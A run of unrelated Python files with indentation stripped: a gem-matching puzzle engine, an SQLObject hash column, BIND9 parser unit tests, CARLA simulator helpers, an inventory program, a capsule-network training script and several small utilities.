indices = []
for color in GEMTYPES:
tmp = np.array(b == color, dtype=int)
binstr = ''.join((str(i) for i in tmp.flatten()))
index = int(binstr, base=2)
indices.append([index]) # TODO: lame that this has to be in a list
return np.array(indices)
def _indicesToBoard(self, indices):
board = np.zeros((4,4))
for color, index in enumerate(indices):
s = bin(index[0])[2:]
s = '0' * (16 - len(s)) + s
coords = [divmod(i, 4) for i in range(len(s)) if s[i] == '1']
for c in coords:
board[c] = color
return board
def _getBlankBoard(self):
# TODO: change to numpy.array
board = []
for x in range(BOARDWIDTH):
board.append([EMPTY_SPACE] * BOARDHEIGHT)
return board
def _getSwappingGems(self, board, firstXY, secondXY):
# If the gems at the (X, Y) coordinates of the two gems are adjacent,
# then their 'direction' keys are set to the appropriate direction
# value to be swapped with each other.
# Otherwise, (None, None) is returned.
firstGem = {'imageNum': board[firstXY['x']][firstXY['y']],
'x': firstXY['x'],
'y': firstXY['y']}
secondGem = {'imageNum': board[secondXY['x']][secondXY['y']],
'x': secondXY['x'],
'y': secondXY['y']}
highlightedGem = None
if firstGem['x'] == secondGem['x'] + 1 and firstGem['y'] == secondGem['y']:
firstGem['direction'] = LEFT
secondGem['direction'] = RIGHT
elif firstGem['x'] == secondGem['x'] - 1 and firstGem['y'] == secondGem['y']:
firstGem['direction'] = RIGHT
secondGem['direction'] = LEFT
elif firstGem['y'] == secondGem['y'] + 1 and firstGem['x'] == secondGem['x']:
firstGem['direction'] = UP
secondGem['direction'] = DOWN
elif firstGem['y'] == secondGem['y'] - 1 and firstGem['x'] == secondGem['x']:
firstGem['direction'] = DOWN
secondGem['direction'] = UP
else:
# These gems are not adjacent and can't be swapped.
return None, None
return firstGem, secondGem
def _canMakeMove(self, board):
return len(self._possibleMoves(board)) > 0
def _possibleMoves(self, board):
# Return True if the board is in a state where a matching
# move can be made on it. Otherwise return False.
# The patterns in oneOffPatterns represent gems that are configured
# in a way where it only takes one move to make a triplet.
oneOffPatterns = (((0,1), (1,0), (2,0), ((0,0), (0,1))),
((0,1), (1,1), (2,0), ((2,0), (2,1))),
((0,0), (1,1), (2,0), ((1,0), (1,1))),
((0,1), (1,0), (2,1), ((1,0), (1,1))),
((0,0), (1,0), (2,1), ((2,0), (2,1))),
((0,0), (1,1), (2,1), ((0,0), (0,1))),
((0,0), (0,2), (0,3), ((0,0), (0,1))),
((0,0), (0,1), (0,3), ((0,2), (0,3))))
# The x and y variables iterate over each space on the board.
# If we use + to represent the currently iterated space on the
# board, then this pattern: ((0,1), (1,0), (2,0))refers to identical
# gems being set up like this:
#
# +A
# B
# C
#
# That is, gem A is offset from the + by (0,1), gem B is offset
# by (1,0), and gem C is offset by (2,0). In this case, gem A can
# be swapped to the left to form a vertical three-in-a-row triplet.
#
# There are eight possible ways for the gems to be one move
# away from forming a triple, hence oneOffPattern has 8 patterns.
moves = []
for x in range(BOARDWIDTH):
for y in range(BOARDHEIGHT):
for pat in oneOffPatterns:
# check each possible pattern of "match in next move" to
# see if a possible move can be made.
if (self._getGemAt(board, x+pat[0][0], y+pat[0][1]) == \
self._getGemAt(board, x+pat[1][0], y+pat[1][1]) == \
self._getGemAt(board, x+pat[2][0], y+pat[2][1]) != None):
moves.append(map(lambda z: (z[0] + x, z[1] + y), pat[3]))
if (self._getGemAt(board, x+pat[0][1], y+pat[0][0]) == \
self._getGemAt(board, x+pat[1][1], y+pat[1][0]) == \
self._getGemAt(board, x+pat[2][1], y+pat[2][0]) != None):
moves.append(map(lambda z: (z[1] + x, z[0] + y), pat[3]))
return moves
def _pullDownAllGems(self, board):
# pulls down gems on the board to the bottom to fill in any gaps
for x in range(BOARDWIDTH):
gemsInColumn = []
for y in range(BOARDHEIGHT):
if board[x][y] != EMPTY_SPACE:
gemsInColumn.append(board[x][y])
board[x] = ([EMPTY_SPACE] * (BOARDHEIGHT - len(gemsInColumn))) + gemsInColumn
def _getGemAt(self, board, x, y):
if x < 0 or y < 0 or x >= BOARDWIDTH or y >= BOARDHEIGHT:
return None
else:
return board[x][y]
def _getDropSlots(self, board):
# Creates a "drop slot" for each column and fills the slot with a
# number of gems that that column is lacking. This function assumes
# that the gems have been gravity dropped already.
boardCopy = copy.deepcopy(board)
self._pullDownAllGems(boardCopy)
dropSlots = []
for i in range(BOARDWIDTH):
dropSlots.append([])
# TODO: remove restriction that there can be no combos from new gems?
# count the number of empty spaces in each column on the board
for x in range(BOARDWIDTH):
for y in range(BOARDHEIGHT-1, -1, -1): # start from bottom, going up
if boardCopy[x][y] == EMPTY_SPACE:
possibleGems = list(range(len(GEMTYPES)))
for offsetX, offsetY in ((0, -1), (1, 0), (0, 1), (-1, 0)):
# Narrow down the possible gems we should put in the
# blank space so we don't end up putting an two of
# the same gems next to each other when they drop.
neighborGem = self._getGemAt(boardCopy, x + offsetX, y + offsetY)
if neighborGem != None and neighborGem in possibleGems:
possibleGems.remove(neighborGem)
newGem = random.choice(possibleGems)
boardCopy[x][y] = newGem
dropSlots[x].append(newGem)
return dropSlots
def _findMatchingGems(self, board):
gemsToRemove = [] # a list of lists of gems in matching triplets that should be removed
boardCopy = copy.deepcopy(board)
# loop through each space, checking for 3 adjacent identical gems
for x in range(BOARDWIDTH):
for y in range(BOARDHEIGHT):
# TODO: make 3x3 L/T-shape matches work
# look for horizontal matches
if self._getGemAt(boardCopy, x, y) == self._getGemAt(boardCopy, x + 1, y) == self._getGemAt(boardCopy, x + 2, y) and self._getGemAt(boardCopy, x, y) != EMPTY_SPACE:
targetGem = boardCopy[x][y]
offset = 0
removeSet = []
while self._getGemAt(boardCopy, x + offset, y) == targetGem:
# keep checking if there's more than 3 gems in a row
removeSet.append((x + offset, y))
boardCopy[x + offset][y] = EMPTY_SPACE
offset += 1
gemsToRemove.append(removeSet)
# look for vertical matches
if self._getGemAt(boardCopy, x, y) == self._getGemAt(boardCopy, x, y + 1) == self._getGemAt(boardCopy, x, y + 2) and self._getGemAt(boardCopy, x, y) != EMPTY_SPACE:
targetGem = boardCopy[x][y]
offset = 0
removeSet = []
while self._getGemAt(boardCopy, x, y + offset) == targetGem:
# keep checking, in case there's more than 3 gems in a row
removeSet.append((x, y + offset))
boardCopy[x][y + offset] = EMPTY_SPACE
offset += 1
gemsToRemove.append(removeSet)
return gemsToRemove
def _getDroppingGems(self, board):
# Find all the gems that have an empty space below them
boardCopy = copy.deepcopy(board)
droppingGems = []
for x in range(BOARDWIDTH):
for y in range(BOARDHEIGHT - 2, -1, -1):
if boardCopy[x][y + 1] == EMPTY_SPACE and boardCopy[x][y] != EMPTY_SPACE:
# This space drops if not empty but the space below it is
droppingGems.append( {'imageNum': boardCopy[x][y], 'x': x, 'y': y, 'direction': DOWN} )
boardCopy[x][y] = EMPTY_SPACE
return droppingGems
def _moveGems(self, board, movingGems):
# movingGems is a list of dicts with keys x, y, direction, imageNum
for gem in movingGems:
if gem['y'] != ROWABOVEBOARD:
board[gem['x']][gem['y']] = EMPTY_SPACE
movex = 0
movey = 0
if gem['direction'] == LEFT:
movex = -1
elif gem['direction'] == RIGHT:
movex = 1
elif gem['direction'] == DOWN:
movey = 1
elif gem['direction'] == UP:
movey = -1
board[gem['x'] + movex][gem['y'] + movey] = gem['imageNum']
else:
# gem is located above the board (where new gems come from)
board[gem['x']][0] = gem['imageNum'] # move to top row
def _fillBoard(self, board):
dropSlots = self._getDropSlots(board)
while dropSlots != [[]] * BOARDWIDTH:
# do the dropping animation as long as there are more gems to drop
movingGems = self._getDroppingGems(board)
for x in range(len(dropSlots)):
if len(dropSlots[x]) != 0:
# cause the lowest gem in each slot to begin moving in the DOWN direction
movingGems.append({'imageNum': dropSlots[x][0], 'x': x, 'y': ROWABOVEBOARD, 'direction': DOWN})
boardCopy = self._getBoardCopyMinusGems(board, movingGems)
self._moveGems(board, movingGems)
# Make the next row of gems from the drop slots
# the lowest by deleting the previous lowest gems.
for x in range(len(dropSlots)):
if len(dropSlots[x]) == 0:
continue
board[x][0] = dropSlots[x][0]
del dropSlots[x][0]
def _getBoardCopyMinusGems(self, board, gems):
# Creates and returns a copy of the passed board data structure,
# with the gems in the "gems" list removed from it.
#
# Gems is a list of dicts, with keys x, y, direction, imageNum
boardCopy = copy.deepcopy(board)
# Remove some of the gems from this board data structure copy.
for gem in gems:
if gem['y'] != ROWABOVEBOARD:
boardCopy[gem['x']][gem['y']] = EMPTY_SPACE
return boardCopy
def __str__(self):
""" Ascii representation of the maze, with the current state """
return pformat(self.board)
|
__all__ = ['HashCol']
import sqlobject.col
class DbHash:
""" Presents a comparison object for hashes, allowing plain text to be
automagically compared with the base content. """
def __init__( self, hash, hashMethod ):
self.hash = hash
self.hashMethod = hashMethod
def __cmp__( self, other ):
if other is None:
if self.hash is None:
return 0
return True
if not isinstance( other, basestring ):
raise TypeError( "A hash may only be compared with a string, or None." )
return cmp( self.hashMethod( other ), self.hash )
def __repr__( self ):
return "<DbHash>"
class HashValidator( sqlobject.col.StringValidator ):
""" Provides formal SQLObject validation services for the HashCol. """
def to_python( self, value, state ):
""" Passes out a hash object. """
if value is None:
return None
return DbHash( hash = value, hashMethod = self.hashMethod )
def from_python( self, value, state ):
""" Store the given value as a MD5 hash, or None if specified. """
if value is None:
return None
return self.hashMethod( value )
class SOHashCol( sqlobject.col.SOStringCol ):
""" The internal HashCol definition. By default, enforces a md5 digest. """
def __init__( self, **kw ):
if 'hashMethod' not in kw:
from hashlib import md5
self.hashMethod = lambda v: md5( v ).hexdigest()
if 'length' not in kw:
kw['length'] = 32
else:
self.hashMethod = kw['hashMethod']
del kw['hashMethod']
super( sqlobject.col.SOStringCol, self ).__init__( **kw )
def createValidators( self ):
return [HashValidator( name=self.name, hashMethod=self.hashMethod )] + \
super( SOHashCol, self ).createValidators()
class HashCol( sqlobject.col.StringCol ):
""" End-user HashCol class. May be instantiated with 'hashMethod', a function
which returns the string hash of any other string (i.e. basestring). """
baseClass = SOHashCol
|
from numpy import *
from matplotlib import pyplot as plt
from math import sqrt
import matplotlib
import time
def drawDat(Dat):
fig=plt.figure(figsize=(20,10))
ax=fig.add_subplot(111)
ax.scatter(Dat[:,0].flatten().A[0],Dat[:,1].flatten().A[0],s=20,c='red')
plt.xlim(0,len(Dat))
plt.ylim(0,35)
plt.show()
def Score(rV,Rh,predic,result):
N=len(predic)
sq1=sqrt(sum([(result[i]-predic[i])**2 for i in predic.iterkeys()])/N)
sq2=sqrt(sum((predic[i])**2 for i in predic.iterkeys())/N)
sq3=sqrt(sum((result[i])**2 for i in result.iterkeys())/N)
return (1-sq1/(sq2+sq3))*(float(sum(rV))/float(sum(Rh)))*100
class f2d():
def __init__(self,filepath):
self.pool=[] # sampleI shape like datas
self.sampleI=[0,
0,0,0,0,0, # Counts of flavor0 ~ flavor15
0,0,0,0,0,
0,0,0,0]
self.legi={"flavor1":1,"flavor2":2,"flavor3":3,"flavor4":4,"flavor5":5,"flavor6":6,"flavor7":7,
"flavor8":8,"flavor9":9,"flavor10":10,"flavor11":11,"flavor12":12,"flavor13":13,
"flavor14":14,"flavor15":15}
with open(filepath, 'r') as f:
lines = f.readlines()
self.stime=self.date2read(lines[0].strip().split('\t')[2])
for line in lines:
self.mkpool(line)
def time2read(self,dt):
dt = dt.split('\t')[0]
return time.mktime(time.strptime(dt,'%Y-%m-%d %H:%M:%S'))
def timeMh(self,d1,d2):
#return int((d1-d2)/604800) #a week
return int((d1-d2)/7200) #a hour
#return int((d1-d2)/86400) #a day
def mkpool(self,raw):
flavor,tm=raw.strip().split("\t")[1:]
TM=self.time2read(tm)
if flavor in self.legi:
hourTM=self.timeMh(TM,self.stime)
#pint hourTM
while hourTM - len(self.pool) >= 0:
sample = self.sampleI[:]
self.pool.append(sample)
self.pool[hourTM][self.legi[flavor]]+=1
def appendDat(self,filepath):
with open(filepath, 'r') as f:
lines = f.readlines()
for line in lines:
self.mkpool(line)
if __name__ == "__main__":
trainSet=f2d("example/TrainData_2015.1.1_2015.2.19.txt")
trainMat=mat(trainSet.pool)
fig=plt.figure(figsize=(20,10))
plt.plot(trainMat[:,1:])
trainSet.appendDat("example/TestData_2015.2.20_2015.2.27.txt")
testMat=mat(trainSet.pool)
fig=plt.figure(figsize=(20,10))
plt.plot(testMat[:,1:])
plt.show()
a = raw_input()
|
class Solution:
def computeArea(self, A, B, C, D, E, F, G, H):
if A < E:
width = C - E if G >= C >= E else G - E if C >= G >= E else 0
else:
width = G - A if C >= G >= A else C - A if G >= C >= A else 0
if B > F:
height = H - B if D >= H >= B else D - B if H >= D >= B else 0
else:
height = D - F if H >= D >= F else H - F if D >= H >= F else 0
return (D - B) * (C - A) + (H - F) * (G - E) - width * height
|
from django.contrib import admin
from src.recipes.models import Recipe
admin.site.register(Recipe)
|
#!/usr/bin/env python3
"""
File: test_clause_managed_keys.py
Description: Performs unit test on the isc_managed_keys.py source file.
"""
import unittest
from bind9_parser.isc_utils import assertParserResultDictTrue, assertParserResultDictFalse
from bind9_parser.isc_clause_managed_keys import clause_stmt_managed_keys_series
class TestClauseManagedKeys(unittest.TestCase):
""" Clause managed-keys """
def test_isc_clause_stmt_managed_keys_passing(self):
""" Clause managed-keys; passing mode"""
test_string = 'managed-keys { abc initial-key 1 2 3 "ASBASDASD==";};'
expected_result = { 'managed_keys': [ { 'algorithm_id': 3,
'flags': 1,
'key_secret': '"ASBASDASD=="',
'protocol_id': 2,
'rr_domain': 'abc'}]}
assertParserResultDictTrue(clause_stmt_managed_keys_series,
test_string,
expected_result)
test_string = 'managed-keys { example.com initial-key 4 5 6 "ASBASDASD==";};'
expected_result = { 'managed_keys': [ { 'algorithm_id': 6,
'flags': 4,
'key_secret': '"ASBASDASD=="',
'protocol_id': 5,
'rr_domain': 'example.com'}]}
assertParserResultDictTrue(clause_stmt_managed_keys_series,
test_string,
expected_result)
test_string = 'managed-keys { www.example.com initial-key 7 8 9 "ZZZZZZASD==";};'
expected_result = { 'managed_keys': [ { 'algorithm_id': 9,
'flags': 7,
'key_secret': '"ZZZZZZASD=="',
'protocol_id': 8,
'rr_domain': 'www.example.com'}]}
assertParserResultDictTrue(clause_stmt_managed_keys_series,
test_string,
expected_result)
test_string = 'managed-keys { www1.www.example.com initial-key 1 1 1 "ASBASDASD==";};'
expected_result = { 'managed_keys': [ { 'algorithm_id': 1,
'flags': 1,
'key_secret': '"ASBASDASD=="',
'protocol_id': 1,
'rr_domain': 'www1.www.example.com'}]}
assertParserResultDictTrue(clause_stmt_managed_keys_series,
test_string,
expected_result)
test_string = 'managed-keys { www1.www.example.com initial-key 1 1 1 "ASBASDASD==";};'
expected_result = { 'managed_keys': [ { 'algorithm_id': 1,
'flags': 1,
'key_secret': '"ASBASDASD=="',
'protocol_id': 1,
'rr_domain': 'www1.www.example.com'}]}
assertParserResultDictTrue(clause_stmt_managed_keys_series,
test_string,
expected_result)
# Example extracted from https://docs.menandmice.com/display/MM/How+to+enable+DNSSEC+validation+in+a+resolving+BIND+DNS+Server
test_string = """managed-keys {
"." initial-key 257 3 8
"AwEAAagAIKlVZrpC6Ia7gEzahOR+9W29euxhJhVVLOyQbSEW0O8gcCjF
FVQUTf6v58fLjwBd0YI0EzrAcQqBGCzh/RStIoO8g0NfnfL2MTJRkxoX
bfDaUeVPQuYEhg37NZWAJQ9VnMVDxP/VHL496M/QZxkjf5/Efucp2gaD
X6RS6CXpoY68LsvPVjR0ZSwzz1apAzvN9dlzEheX7ICJBBtuA6G3LQpz
W5hOA2hzCTMjJPJ8LbqF6dsV6DoBQzgul0sGIcGOYl7OyQdXfZ57relS
Qageu+ipAdTTJ25AsRTAoub8ONGcLmqrAmRLKBP1dfwhYB4N7knNnulq
QxA+Uk1ihz0=";
}; """
expected_result = { 'managed_keys': [ { 'algorithm_id': 8,
'flags': 257,
'key_secret': '"AwEAAagAIKlVZrpC6Ia7gEzahOR+9W29euxhJhVVLOyQbSEW0O8gcCjF\n'
' '
'FVQUTf6v58fLjwBd0YI0EzrAcQqBGCzh/RStIoO8g0NfnfL2MTJRkxoX\n'
' '
'bfDaUeVPQuYEhg37NZWAJQ9VnMVDxP/VHL496M/QZxkjf5/Efucp2gaD\n'
' '
'X6RS6CXpoY68LsvPVjR0ZSwzz1apAzvN9dlzEheX7ICJBBtuA6G3LQpz\n'
' '
'W5hOA2hzCTMjJPJ8LbqF6dsV6DoBQzgul0sGIcGOYl7OyQdXfZ57relS\n'
' '
'Qageu+ipAdTTJ25AsRTAoub8ONGcLmqrAmRLKBP1dfwhYB4N7knNnulq\n'
' QxA+Uk1ihz0="',
'protocol_id': 3,
'rr_domain': '"."'}]}
assertParserResultDictTrue(clause_stmt_managed_keys_series,
test_string,
expected_result)
def test_isc_clause_stmt_managed_keys_failing(self):
""" Clause managed-keys; purposely failing mode"""
test_string = 'managed-keys { . initial-key 257 3 3 "AAAAAAAAA+BBBBBBBBBBBBB/CCXCCCCCCCCCCCCC";};'
expected_result = {}
assertParserResultDictFalse(clause_stmt_managed_keys_series,
test_string,
expected_result)
if __name__ == '__main__':
unittest.main()
|
__author__ = "Max Bachmann"
__license__ = "MIT"
__version__ = "1.0.2"
from ._initialize import *
|
import json
import numpy as np
import cv2
def generate():
"""Generate legend image from materials configuration."""
# load material file
with open("materials.json", "r") as f:
materials = json.load(f)
# font setup
fontFace = cv2.FONT_HERSHEY_SIMPLEX
fontScale = 0.8 #0.4375 # as seen in bp_to_img > __create_images
max_width = 0
max_height = 0
max_baseline = 0
for k in materials:
# get size
(width, height), baseline = cv2.getTextSize(k, fontFace, fontScale, 2)
height += baseline
max_width = max(max_width, width)
max_height = max(max_height, height)
max_baseline = max(max_baseline, baseline)
# image setup
front_space = 15
back_space = 10
top_space = 15
bottom_space = 15
background_color = np.array([255, 118, 33]) # "blueprint" blue
img_size = (top_space + max(len(materials) - 1, 0) * 5 + len(materials) * max_height + bottom_space,
front_space + max_height + 5 + max_width + back_space,
3)
img = np.full(img_size, background_color, dtype=np.uint8)
# image creation
current_y = top_space
text_loc_x = front_space + max_height + 5
text_loc_y = max_height - max_baseline
for k in materials:
# fill square with material color
img[current_y:current_y+max_height, front_space:front_space+max_height] = materials[k]["Color"]
# put text
cv2.putText(img, k, (text_loc_x, current_y + text_loc_y), fontFace, fontScale, (255, 255, 255), 2)
# next
current_y += 5 + max_height
# show / save
cv2.imwrite("legend.png", img)
if __name__ == "__main__":
generate()
exit()
|
from .fyve import Fyve |
#!/usr/bin/env python3
#
# corporation.py
# SWN Corporation Generator
#
# Copyright (c) 2014 Steve Simenic <[email protected]>
#
# This file is part of the SWN Toolbox.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
import json
import random
import sys
class Corporation:
"""
This class generates an corporation from tables/corporation.json,
which has the following attributes:
- name (string)
- business (string)
- reputation (string)
"""
def __init__(self):
with open("tables/corporation.json", "r") as file:
corporation = json.load(file)
self.name = str(random.choice(corporation["name"]))
self.business = str(random.choice(corporation["business"]))
self.reputation = str(random.choice(corporation["reputation"]))
def __str__(self):
r = [
"Name: " + self.name,
"Business: " + self.business,
"Reputation: " + self.reputation
]
return "\n".join(r)
if __name__ == "__main__":
try:
times = int(sys.argv[1])
except:
times = 1
for i in range(times):
if i != 0:
print("-----------+-+-+-----------")
print(Corporation())
|
"""
This file includes a number of helper functions for the main loop of the carla simulator.
This includes printing measurements and steering.0
"""
from carla import VehicleControl
try:
from pygame.locals import K_DOWN
from pygame.locals import K_LEFT
from pygame.locals import K_RIGHT
from pygame.locals import K_SPACE
from pygame.locals import K_UP
from pygame.locals import K_a
from pygame.locals import K_d
from pygame.locals import K_p
from pygame.locals import K_q
from pygame.locals import K_r
from pygame.locals import K_s
from pygame.locals import K_w
except ImportError:
raise RuntimeError(
'cannot import pygame, make sure pygame package is installed')
# Copyright (c) 2017 Computer Vision Center (CVC) at the Universitat Autonoma de
# Barcelona (UAB).
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
import datetime
import sys
from contextlib import contextmanager
@contextmanager
def make_connection(client_type, *args, **kwargs):
"""Context manager to create and connect a networking client object."""
client = None
try:
client = client_type(*args, **kwargs)
client.connect()
yield client
finally:
if client is not None:
client.disconnect()
class StopWatch(object):
def __init__(self):
self.start = datetime.datetime.now()
self.end = None
def restart(self):
self.start = datetime.datetime.now()
self.end = None
def stop(self):
self.end = datetime.datetime.now()
def seconds(self):
return (self.end - self.start).total_seconds()
def milliseconds(self):
return 1000.0 * self.seconds()
def to_hex_str(header):
return ':'.join('{:02x}'.format(ord(c)) for c in header)
if sys.version_info >= (3, 3):
import shutil
def print_over_same_line(text):
terminal_width = shutil.get_terminal_size((80, 20)).columns
empty_space = max(0, terminal_width - len(text))
sys.stdout.write('\r' + text + empty_space * ' ')
sys.stdout.flush()
else:
# Workaround for older Python versions.
def print_over_same_line(text):
line_length = max(print_over_same_line.last_line_length, len(text))
empty_space = max(0, line_length - len(text))
sys.stdout.write('\r' + text + empty_space * ' ')
sys.stdout.flush()
print_over_same_line.last_line_length = line_length
print_over_same_line.last_line_length = 0
class KeyboardHelper:
def get_keyboard_control(keys, is_on_reverse, enable_autopilot):
if keys[K_r]:
return None
control = VehicleControl()
if keys[K_LEFT] or keys[K_a]:
control.steer = -1.0
if keys[K_RIGHT] or keys[K_d]:
control.steer = 1.0
if keys[K_UP] or keys[K_w]:
control.throttle = 1.0
if keys[K_DOWN] or keys[K_s]:
control.brake = 1.0
if keys[K_SPACE]:
control.hand_brake = True
if keys[K_q]:
is_on_reverse = not is_on_reverse
if keys[K_p]:
enable_autopilot = not enable_autopilot
control.reverse = is_on_reverse
return control, is_on_reverse, enable_autopilot
class MeasurementsDisplayHelper:
def print_player_measurements_map(player_measurements, map_position, lane_orientation, timer):
message = 'Step {step} ({fps:.1f} FPS): '
message += 'Map Position ({map_x:.1f},{map_y:.1f}) '
message += 'Lane Orientation ({ori_x:.1f},{ori_y:.1f}) '
message += '{speed:.2f} km/h, '
message += '{other_lane:.0f}% other lane, {offroad:.0f}% off-road'
message = message.format(
map_x=map_position[0],
map_y=map_position[1],
ori_x=lane_orientation[0],
ori_y=lane_orientation[1],
step=timer.step,
fps=timer.ticks_per_second(),
speed=player_measurements.forward_speed * 3.6,
other_lane=100 * player_measurements.intersection_otherlane,
offroad=100 * player_measurements.intersection_offroad)
print_over_same_line(message)
def print_player_measurements(player_measurements, timer):
message = 'Step {step} ({fps:.1f} FPS): '
message += '{speed:.2f} km/h, '
message += '{other_lane:.0f}% other lane, {offroad:.0f}% off-road'
message = message.format(
step=timer.step,
fps=timer.ticks_per_second(),
speed=player_measurements.forward_speed * 3.6,
other_lane=100 * player_measurements.intersection_otherlane,
offroad=100 * player_measurements.intersection_offroad)
print_over_same_line(message)
|
if __name__ == "__main__":
inventorydict = {}
inventoryprice = {}
itemgroup = {}
while True:
print('press 1 to create inventory items', '\npress 2 to delete items from inventory', '\npress 3 to view items in inventory', '\npress 4 to edit items in inventory', '\npress 5 to assign items to a group and view groups', '\npress 6 to quit')
inp = input('Choose an option: ')
if inp == '1':
while True:
inp1 = input('type items or type exit to quit: ').lower()
if inp1 == 'exit':
break
inp2 = input('set price: ')
if inp1 == 'exit' or inp2 == 'exit':
break
else:
if inp1 not in inventorydict:
inventorydict[inp1] = 1
inventoryprice[inp1] = inp2
else:
inventorydict[inp1] += 1
inventoryprice[inp1] = inp2
if inp == '2':
while True:
inp3 = input('which item do you want to remove? or type exit to quit: ').lower()
if inp3 == 'exit':
break
else:
if inp3 in inventorydict:
inventorydict.pop(inp3)
inventoryprice.pop(inp3)
itemgroup.pop(inp3)
else:
print('item is not in the inventory')
if inp == '3':
while True:
inp4 = input('Do you want to view items? (Y/N) or type exit to quit: ').lower()
if inp4 == 'exit' or inp4 == 'no':
break
if inp4 == 'y':
for i in inventorydict and inventoryprice:
print(f'item: {i}, quantity: {inventorydict[i]}, price per item: {inventoryprice[i]}')
if inp == '4':
while True:
inp5 = input('Do you want to change price or quantity or group? (P/Q/G) or type exit to quit: ').lower()
if inp5 == 'exit':
break
if inp5 == 'p':
inp6 = input('give item name: ').lower()
if inp6 in inventorydict:
inp7 = input('set new price: ')
inventoryprice[inp6] = inp7
else:
inp8 = input('Item not in inventory. Would you like to add? (Y/N)').lower()
if inp8 == 'n':
break
if inp8 == 'y':
inp10 = input('item price: ')
inventorydict[inp6] = 1
inventoryprice[inp6] = inp10
if inp5 == 'q':
inp11 = input('give item name: ').lower()
if inp11 in inventorydict:
inp12 = input('set new quantity: ')
inventorydict[inp11] = inp12
else:
inp13 = input('Item not in inventory. Would you like to add? (Y/N)').lower()
if inp13 == 'n':
break
if inp13 == 'y':
inp14 = input('set new quantity: ')
inp15 = input('set new price: ' )
inventorydict[inp11] = inp14
inventoryprice[inp11] = inp15
if inp5 == 'g':
if len(itemgroup)==0:
print('No groups available!')
break
else:
while True:
inp19 = input('type item name or exit to quit: ').lower()
if inp19 == 'exit':
break
if inp19 not in itemgroup:
print('This item does not have a group!')
break
inp20 = input('Do you want to assign or exit? (assign/exit) ').lower()
if inp20 == 'assign':
inp21 = input('set group name: ')
inp22 = input('set quantity: ')
inp23 = input('set price: ')
inventorydict[inp19] = inp22
inventoryprice[inp19] = inp23
itemgroup[inp19] = inp21
if inp == '5':
if len(inventorydict)==0 and len(inventoryprice)==0:
print('You dont have any items in your inventory!')
else:
while True:
inp16 = input('Do you wish to view item group or create new group? (view/create) or type exit to quit: ').lower()
if inp16 == 'create':
inp17 = input('type item name: ').lower()
inp18 = input('type item group name: ').lower()
itemgroup[inp17] = inp18
if inp16 == 'view' and len(itemgroup)==0:
print('You dont have any groups!')
break
if inp16 == 'view':
for i in itemgroup:
print(f'item: {i}, quantity: {inventorydict[i]}, price per item: {inventoryprice[i]}, item group: {itemgroup[i]}')
if inp16 =='exit':
break
if inp == '6':
break |
from shutil import copyfile
import json
import datetime
import argparse
import sys
import os
sys.path.append(os.path.abspath('../'))
# SEEDS
from numpy.random import seed
seed(1234)
from tensorflow import set_random_seed
set_random_seed(1234)
# CONFIG
import config
from config import path_output, path_logs, path_checkpoints, path_tests, path_predictions, h, w
from config import monitor, mode, filename_save, save_best_only, use_multiprocessing, workers, max_queue_size, initial_epoch
from config import batch_size, epochs, custom_callbacks, pretrain_config, load_weights_by_name, freeze_loaded_weights
from config import steps_per_epoch, validation_steps, steps
from config import optimizer, loss, metrics, loss_weights
from config import do_pipeline_predictions, do_pipeline_hidden, shuffle_pred, steps_pred
# UTILS
from utils.callbacks import get_common_callbacks
from utils.batch_generators import DatasetGenerator
from utils.enums import Mode, Dataset, Feature
# MODELS
from models.conv_blocks import ApiConvBlocks, NO_CONV_BLOCK
from models.caps_blocks import ApiCapsBlocks, ApiCapsBlocks_flatten, NO_CAPS_BLOCK, caps_block_get_group
# DEEP
import h5py
import cv2
import numpy as np
from keras import backend as K
from keras.layers import Input
from keras.models import Model
K.set_image_data_format('channels_last')
def build_model(caps_block_group, caps_block_value, conv_block_value, mode_value, inputs, path_model = None):
# Load model from API Catalog
outputs = ApiCapsBlocks[caps_block_group][caps_block_value](conv_block_value, mode_value, inputs)
# Model definition
model = Model(inputs, outputs, name = '__'.join([caps_block_group, caps_block_value, conv_block_value]))
# If load weights
if path_model is not None:
# If string, make it list (as 'pretrain_config' is)
if isinstance(path_model, str):
path_model = [path_model]
# Load all weights files
for path_model_item in path_model:
model.load_weights(path_model_item, by_name = load_weights_by_name)
# Freeze loaded weights
if freeze_loaded_weights:
for name in [layer.name for layer in model.layers if layer.name in list(h5py.File(path_model_item, 'r').keys())]:
model.get_layer(name).trainable = False
# Compile the model
model.compile(optimizer = optimizer, loss = loss, metrics = metrics, loss_weights = loss_weights)
return model
def train(caps_block_value, conv_block_value, feature_value):
# Set Mode Value
mode_value = Mode.train.value
# Get capsule model group
caps_block_group = caps_block_get_group(caps_block_value)
# Config generators
gen_train = DatasetGenerator(batch_size = batch_size, image_size = (h, w), shuffle = True, dataset_value = Dataset.train.value, steps_per_epoch = steps_per_epoch)
gen_val = DatasetGenerator(batch_size = batch_size, image_size = (h, w), shuffle = True, dataset_value = Dataset.val.value)
inputs = gen_train.config_pipeline(caps_block_group, caps_block_value, conv_block_value, feature_value, mode_value)
_ = gen_val.config_pipeline(caps_block_group, caps_block_value, conv_block_value, feature_value, mode_value)
# Subfolder
experiment_id = datetime.datetime.now().strftime('%Y%m%d_%H_%M_%S')
sub_folder = os.path.join(path_output, feature_value, conv_block_value, caps_block_value, experiment_id)
# Callbacks
callbacks = get_common_callbacks(sub_folder = sub_folder, path_logs = path_logs, path_checkpoints = path_checkpoints,
monitor = monitor, mode = mode, filename_save = filename_save, save_best_only = save_best_only) + custom_callbacks
# Copy config file to experiment folder
copyfile(config.__file__, os.path.join(sub_folder, 'config_train.py'))
# Model
model = build_model(caps_block_group, caps_block_value, conv_block_value, mode_value, inputs, pretrain_config)
